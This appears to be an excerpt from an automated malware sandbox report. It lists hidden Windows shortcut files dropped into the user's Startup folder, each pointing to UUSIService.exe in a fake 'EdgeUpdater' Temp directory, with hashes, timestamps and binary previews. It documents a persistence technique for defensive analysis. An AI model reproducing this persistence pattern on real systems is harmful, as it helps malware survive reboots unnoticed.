Preview:	L..................F...."............r.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_90b3c86715ff47d8811cac966375b65f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:07 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92582779834666
Encrypted:	false
SSDEEP:	24:8ZTHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8JHfNDp2l9tJRBzfNZ47/yg
MD5:	AFEB6E84CE98E48F83B9A4B87C92AED3
SHA1:	1C1BF0069B20F9E6E9A7646F9F63594630361517
SHA-256:	2F50C23798B9811B0AFFB845A266C27D45B0426D9FD14A8DCA3EADDF5E6B6ED7
SHA-512:	A7284B7F33F4C733EFA3E20490113AEA912E674E538D642A8B00CFBD0F5C3755A1FCDCB5D405BAC22D336BE69615FDFAFE94818B662A9A6A12671A449D4783FF
Malicious:	false
Preview:	L..................F...."............)$.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_93aafa93c43d46bf8c06e5b52dfb5edb.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:18 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.916273155632047
Encrypted:	false
SSDEEP:	24:8ZyFWHZDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHZDp2l9tJRBzfNZ47/yg
MD5:	0AAEDAA2BBC9BFD66CF15710EEE2C453
SHA1:	3BC733EB9FBC2990C5F5ECCC4842D3046980124E
SHA-256:	F11A01BAB77311556AF0FB23862D8A215D418E16F0F3FF068389196A96674E9A
SHA-512:	09159E151919C56B6647AFC0CE0B7232695C70C41BA81DF7A3E785F94562DA6F9F1D6EC6141EA2D534BA9740C36D06D2C7D5122D831A161ECDB3DD16D7B5ED01
Malicious:	false
Preview:	L..................F...."...........C.D....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S...........-.E........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_955a0ab24a744d3bba6d4b99fa7724f9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:34 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.93063528995899
Encrypted:	false
SSDEEP:	24:8Z4HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8eHfNDp2l9tJRBzfNZ47/yg
MD5:	D4D7670E0E0A4FE761D3FD7A7FC46D83
SHA1:	58DE6E4959CCA499A1C9964604545DAA53844B2D
SHA-256:	981380E13A2877FCF56F8B58E4680E64D6A72C950ACAAC815833EB4A0C168E08
SHA-512:	9CDED46F7AE9B7C1B282E0A6D1CF3947C0ABF7C1C6F70E3A8191CFBC4B348D1EDAD056E51A2311E8D751B43FC28661B94071C638CCFA16F3C422D7F54275EA01
Malicious:	false
Preview:	L..................F....".............*....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk

Download File

Process:	C:\Users\user\Desktop\Yc9hcFC1ux.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:42 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.925571753122761
Encrypted:	false
SSDEEP:	24:8ZQ/HTDp2lXttXZR0lgKvMtZ/KIZecyAFa7igk3qygm:82/HTDp2l9tJR0dMf/HZ47/yg
MD5:	B9956D62F78B252E7AA774B7640A615A
SHA1:	F082DB17BE2160AFBC567E39B7C1C861EE43D81A
SHA-256:	5B6684C4FC11E840E2C5164B008287285D38DEA929367BF20952EED4CBCC93B3
SHA-512:	618B268F95DE74275654204F8713840C9663041716FCC51894989B60A14871667276C17C2260CFF6415147E11480A968C2528873A1AB37D68A3E0D8B21D1F131
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.....................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY4B..Temp..:......EW<2KY4B....^.....................%.5.T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8.....................N..E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a17d5cfeb5ef442da8c2a20bed8d9d8f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:45 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922885824327945
Encrypted:	false
SSDEEP:	24:8ZI5HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8EHfNDp2l9tJRBzfNZ47/yg
MD5:	F9F4C2354704AEE9383D90E003779E52
SHA1:	D6E04241CDA639FCECD22F74DFE94FD1DED536A8
SHA-256:	1506FF605D742E2677850CF84A3CDAA3A78BD56F75B337556BAEC3C009EC2A68
SHA-512:	6F722101A057FCCD9C52D4DD7D2FBFDD6EEBFD7B08C33A21F987421066ABC7B901AE73B5E4127817D7CCC90A653A44A96EBACFCC52EDA78F65C2955BCD0F1374
Malicious:	false
Preview:	L..................F...."............(......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a3d43ce0cbc14e6199a53576fc8dc769.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:05 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9247998384940415
Encrypted:	false
SSDEEP:	24:8Z/HuDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8xHuDp2l9tJRBzfNZ47/yg
MD5:	647C8349A397ED51DBB44AC91A072A0F
SHA1:	7127BEEEB1223DF6D7EF2F5F806DEFF25AB04645
SHA-256:	688E2DFF2C7862D6051E7B8995DC7CA8B260413D38C46D1A4BFA7E93692C8F69
SHA-512:	463CCA19E7D31C2147FD04490E8F02F87B3B2BCC7DC0514BF15AC36C58DA376B7A48333E5F5F2C3D6B3D123E0B6F5779B0B93F428D88B926E5EB115BE0CF45DA
Malicious:	false
Preview:	L..................F...."...........yz.<....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........*s.=........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_a70151abc03140619fc377a02390a2ba.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:39 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9220590842968726
Encrypted:	false
SSDEEP:	24:8ZIHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8yHfNDp2l9tJRBzfNZ47/yg
MD5:	ECE21F8226CCECC9D1D378F988CB7048
SHA1:	69E1FE975C3C6C1194DCB2BCE647EABFD5594E25
SHA-256:	1B42B2FBD879494B278EF2A4ABE7E414FD10458B007DFCD4E0A00ABE48ABC236
SHA-512:	20085A3776A8C71212C5A6CF451C383B7035EDAC22B9B96FAD95A4482830AEB46178439979AE158E12CDE18B0079950568749AEF4EA2A77E8982369ACEDA8E72
Malicious:	false
Preview:	L..................F...."..............-....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b43de8fdaedd43b9afe7708cdd752d2c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:09 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924645979793251
Encrypted:	false
SSDEEP:	24:8ZBWHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8+HfNDp2l9tJRBzfNZ47/yg
MD5:	2ED4702B4EB40770C68C294D438C7586
SHA1:	2C8255D3CF1758441282F6AEE2E6111524DFA0CC
SHA-256:	763A25EE6F628ECD89F1956EB5DE1911C03323CC614EA22BD61F68E9E59089CB
SHA-512:	48466CDA53E293562211054F32EE96E86689D546C223FFB434231E33B0AEF3F3FAF370BC747084C9CDF4291EFC005D9475780521697FA344E009B4D5DA596BB3
Malicious:	false
Preview:	L..................F...."...........{.^.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4a40f23d119492b9c36293469b7816f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:12 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926911597527466
Encrypted:	false
SSDEEP:	24:8ZtHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8LHfNDp2l9tJRBzfNZ47/yg
MD5:	AA0CACCE48FD9B00A47268ADC395EBF6
SHA1:	0FCA01DE840FAF0D2E1EC9421376BEB4CBC77B24
SHA-256:	FEDF8F8B049A40C37C38DDBF0C2DB437676E6CE4B5408D61B804BFD597C434C1
SHA-512:	29F2BC85C564072E54B1B274F173AF42BC748CDE5D247CD202755F6989D210AEAF8A4874FBA621D2274DECEF24ACE767B443FF67064EE111DBD632ED1E0D37DF
Malicious:	false
Preview:	L..................F...."............+Q.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4a93417345144c0b1024fbce655098b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:25 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924700406923403
Encrypted:	false
SSDEEP:	24:8ZoHvVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8aHdDp2l9tJRBzfNZ47/yg
MD5:	036BFDC401EF6CC1BEB640742C34E849
SHA1:	502218BBB75FE3E2684DF3849EBB816A97280BB1
SHA-256:	138BC9DB2E267C36E91A4266650F87CF8A9336582ABE60347E570EB2A3140E09
SHA-512:	CEEC7B25ED9179BBEB6B4C9585100A28B14379D5C4DDC71B182A0151C0B3E2A835B52977EC5DB865FF0F2F2396DB0727F69F9D6597C5D7F1CB59BB4F23DA0F87
Malicious:	false
Preview:	L..................F....".............H....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+4.I........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4e89d62b6314802b698f778719c4e41.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:17:56 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9239295062205155
Encrypted:	false
SSDEEP:	24:8ZlhHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8fhHfNDp2l9tJRBzfNZ47/yg
MD5:	29E1747E6034FF4788DB8274B93A59F7
SHA1:	4F0E5DE6BDAE3E896B3921535FA80C90F6CE7609
SHA-256:	AF81A09564E5DDDC1A6AE84663C4DDFFEFC9EF4AAF6DB9D0C529B6033DA3FEDA
SHA-512:	23C9396C63AE079AB3052E9D61F77A320EE658361F90ED6B6138B9B649E68226E2D3550829C3C1CA3547293230941CBA6092852DCCEB6AC0D7B0954EAD1BC093
Malicious:	false
Preview:	L..................F...."...........h.......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b4e939a622f340eea3400b8bdbfc86f2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:10 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923039683028735
Encrypted:	false
SSDEEP:	24:8ZiHJcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8kHeDp2l9tJRBzfNZ47/yg
MD5:	7949148F4E695B2204C3900669A6FB22
SHA1:	D8D8E680E4A865F8530145F651574D6D8636CA80
SHA-256:	BDE95E58A4AF6CDE78BD9E419A96CCE9A10C2B6EF6DFF8446062B47615BA07DB
SHA-512:	18C1C895476C2498DE0808551299D9C30467922C84B9183AAB68C5A265031F938FD14E0CCC6AB60EF6E49B7AA58FDB7EC3CC6AAEF3624F1A3CA5E083DE6F2DEE
Malicious:	false
Preview:	L..................F...."............i.@....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........`..@........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_b57470c38d394fa8867c44498ed71109.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:28 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926238716197182
Encrypted:	false
SSDEEP:	24:8ZQHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8OHfNDp2l9tJRBzfNZ47/yg
MD5:	D36DFA9E22A85D902755947CC2E4E529
SHA1:	1283D7EF80FD2776A03ED252786F6F2CE4CFDB52
SHA-256:	19C705ECDBDC4A30E39EBC1B99EF20B087CA17EA17206A0D7BA86F7A45A560F9
SHA-512:	03812E4B1D65607815F7946004CAF3F1C518A1B42C222F09C93FC35E0B3DF2616E422994AD9C9904EBEC143C215825138F077BDE7731F08BDD31D705E297B4C0
Malicious:	false
